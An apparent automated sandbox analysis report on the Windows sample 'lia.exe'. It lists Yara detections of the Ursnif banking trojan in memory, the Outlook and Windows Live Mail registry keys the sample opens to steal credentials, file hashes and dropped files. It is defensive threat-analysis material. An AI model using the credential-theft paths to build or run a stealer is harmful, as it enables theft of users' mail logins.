Source: Yara match	File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR
Source: Yara match	File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR
Source: Yara match	File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY

Windows Analysis Report lia.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	551720
Product:	CloudBasic
Start time:	13:23:02
Start date:	12.01.2022
Sample:	lia.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	8b893e03dd1c7ce96df57f92f302dcb1
SHA1:	a7a131ea9f39ebaa195296ebd9b44708bee8264d
SHA256:	dd023f1f2ce682e9db588aa6cb859b6279d5e43f87a9a99da3cd683711736324
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	1F1446CE05A385817C3EF20CBD8B6E6A	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	13AF6BE1CB30E2FB779EA728EE0A6D67	F33581AC2C60B1F02C978D14DC220DCE57CC9562	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
C:\Users\user\AppData\Local\Temp\6AF4.bi1	ASCII text, with CRLF line terminators	1658AC427436559C818CE024565FC43B	8ECC6A8B9512D66EC9816669273CD2934075ADA8	6AE6B137C04602F2D9D5191E3F6E8F54FB4E9D1FA63C3061CCF909A30966ADDD
C:\Users\user\AppData\Local\Temp\RES533B.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols	A974F32B7F7707A15E329484C029FCE1	2621E2D5447F8FC9FF7A9B7F88CAC98FE9B19A51	6C981182473D13DC5D1099250AF54771565EEC648223281D733144F0CC0EE8D1
C:\Users\user\AppData\Local\Temp\RES771E.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols	3A1A501A900E890F9D548701B67521FC	C7DD8F45F2C2A177B2FF710F2545AE7024DDCAD9	F3902890484CFBE4C336D55730FB0CE6C9DE183861F2AE6DE9F210B1019C3E62
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0usnm2v.qwh.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xi43ekak.cat.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\vjag4cgm\CSC876E17C1D4FA4A478F85FCB91E435E.TMP	MSVC .res	800445E4E2AAD2FA0D334051ADF0B364	893D3C4C6D0041709E0BBD5726DE73160AA5A5BA	967441E6D1D57937C05FFF1939F85674CCBE41CE85434EBE37C4103F33088442
C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.0.cs	UTF-8 Unicode (with BOM) text	F0B963F8AA00CA94A4AD66F311B988E2	37F7E8D69DDEA558DEFD0C10FF1157E26884E7EC	96038DB143062F959B6F1CA6944FCB0D291DA99881953ADE5A6BA02161CFA82A
C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	3CCDF50B51E07687856A23D12A29A979	FFF5CC8F1A2E1229DE4A1A5C794189E35A96726F	78D3B92A64C7EA86A6538D9B698F1E56CAC11B8603255FFEB88DBAC57F4361D9
C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	85B2E4E1F05436271174EC39486A0A95	2FE6CCACF593BE6DB43407CC0D176879C5D02CD2	7D827D9448E8380AD6CED5A961116F65916A5798A9E41EBCC4B656E3617E1054
C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	96947B50878F73CE5428D23AAE4787E0	A1A096819E23C98480A3DFA2463B34AB506A9E35	0E6B59B50FF03F9E522773D40648E6CB72EE541EE22E4086D19FF7FA7503BE71
C:\Users\user\AppData\Local\Temp\wvnfnueh\CSCD2B2FCBE1BFD4A96A519A01DF502239.TMP	MSVC .res	9F24615A9A0A013476B4D3C60DE4525A	34FACB8DA6C81CE5F3BE94D9D1130EBDC9CCBE65	84326AA94A233AC6F56DBEF12E2F21784B370C7A11D6E77E2106AC735114C4C4
C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.0.cs	UTF-8 Unicode (with BOM) text	030386E2BD305EC55BEE50D72051A0C2	618FE858F3B7B1296E760EE21969463861B875E3	2DABA5D5466729FE4AD5753FBB2F95BC486F9AF12A59516BA175F6FF2062CE44
C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	C5C643579061A3DB5B51E3E4589C060C	BE2E53E17AF0989CE4341AA551AFB2D9123A52D0	EF4E87C963F4A33CC15F16C84D10024AE58BAB6B7062AD65A1268322E266416A
C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	14629306DBDED3960A7A17BFE2D29866	C5450DA4EF9A5D248A282B4B8264157E15EEC086	840B408EFD8F6F09CD463A1E00BF3A2BAFFDBFC75C8BEFE9B07C4AFB87236CBC
C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	28AAE55A9F6E5B949444334DBC754B88	2AE5170E6163517F855D41B872936A6EBD76D169	C0BD1551BC8BB210614F5220F1785F42773E4BAC920C82049144010C2AADD590
C:\Users\user\Documents\20220112\PowerShell_transcript.899552.kRmcsOqr.20220112132441.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	15935D59DA482A07DCDF2A72F4B6AA8D	B8D1B57BF6714C19B9227DFA395D3DAC6C264E24	74120FC42D802AE356E5E1280A6E8FA860498B7B8CF837123F501F554436C34A
\Device\ConDrv	ASCII text, with CRLF, CR line terminators	D796BA3AE0C072AA0E189083C7E8C308	ABB1B68758B9C2BF43018A4AEAE2F2E72B626482	EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E